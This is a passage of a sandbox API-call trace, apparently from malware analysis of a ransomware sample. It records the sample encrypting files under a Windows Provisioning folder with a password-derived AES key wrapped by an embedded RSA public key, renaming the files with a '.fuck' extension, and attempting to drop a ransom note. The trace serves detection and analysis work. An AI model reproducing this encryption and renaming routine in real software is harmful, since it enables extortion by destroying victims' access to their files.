(lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.579] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.580] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.gsg")) returned 0 [0237.580] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.fuck")) returned 0 [0237.580] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.580] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.580] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.580] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.581] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.581] GetLastError () returned 0x5 [0237.581] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml")) returned 0x20 [0237.581] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.581] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.581] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.582] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.582] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.584] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.584] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.584] CryptHashData (hHash=0x28463e0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.584] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846460) returned 1 [0237.585] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.585] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.585] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2845650) returned 1 [0237.585] CryptImportPublicKeyInfo (in: hCryptProv=0x2845650, dwCertEncodingType=0x1, pInfo=0x284f0b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f0e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f0f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28464e0) returned 1 [0237.585] CryptEncrypt (in: hKey=0x28464e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.585] CryptEncrypt (in: hKey=0x28464e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844ee0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2844ee0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.585] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844ee0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.586] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2857568, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2857568, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.586] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857568*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2857568*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.586] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857568, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.586] CloseHandle (hObject=0xffffffff) returned 1 [0237.586] CloseHandle (hObject=0xffffffff) returned 1 [0237.586] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.586] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.586] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.gsg")) returned 0 [0237.587] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.fuck")) returned 0 [0237.587] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.587] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.587] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.587] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.587] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2845de0 [0237.588] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.588] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.588] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2845fe0 [0237.588] FindNextFileA (in: hFindFile=0x2845fe0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.588] FindNextFileA (in: hFindFile=0x2845fe0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.588] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.588] GetLastError () returned 0x5 [0237.588] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.603] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.603] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.603] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.604] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.604] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844b28) returned 1 [0237.607] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.607] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.607] CryptHashData (hHash=0x2846060, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.607] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2846060, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846460) returned 1 [0237.607] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.607] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.607] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28455c8) returned 1 [0237.608] CryptImportPublicKeyInfo (in: hCryptProv=0x28455c8, dwCertEncodingType=0x1, pInfo=0x284fc18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284fc48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284fc50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2845ee0) returned 1 [0237.608] CryptEncrypt (in: hKey=0x2845ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.608] CryptEncrypt (in: hKey=0x2845ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2845a90*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2845a90*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.608] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2845a90, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.608] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2857d70, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.608] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857d70*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2857d70*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.608] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.608] CloseHandle (hObject=0xffffffff) returned 1 [0237.608] CloseHandle (hObject=0xffffffff) returned 1 [0237.608] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.609] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.609] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.609] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.609] CryptDestroyHash (hHash=0x2846060) returned 1 [0237.609] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.610] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.610] FindNextFileA (in: hFindFile=0x2845fe0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.610] FindClose (in: hFindFile=0x2845fe0 | out: hFindFile=0x2845fe0) returned 1 [0237.610] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.610] AreFileApisANSI () returned 1 [0237.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2844b28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.610] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.610] GetLastError () returned 0x5 [0237.610] GetLastError () returned 0x5 [0237.610] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.610] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.611] GetLastError () returned 0x5 [0237.611] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml")) returned 0x20 [0237.611] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.611] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.611] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.612] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.612] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2844b28) returned 1 [0237.614] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.614] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.614] CryptHashData (hHash=0x2846460, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.614] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2846460, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2845fe0) returned 1 [0237.614] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.615] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.615] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2845ba0) returned 1 [0237.615] CryptImportPublicKeyInfo (in: hCryptProv=0x2845ba0, dwCertEncodingType=0x1, pInfo=0x284fce8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284fd18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284fd20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2846060) returned 1 [0237.615] CryptEncrypt (in: hKey=0x2846060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.615] CryptEncrypt (in: hKey=0x2846060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844e58*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2844e58*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.615] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844e58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.616] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x2857d70, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.616] CryptEncrypt (in: hKey=0x2845fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857d70*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x2857d70*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.616] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.616] CloseHandle (hObject=0xffffffff) returned 1 [0237.616] CloseHandle (hObject=0xffffffff) returned 1 [0237.616] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.616] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.616] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.gsg")) returned 0 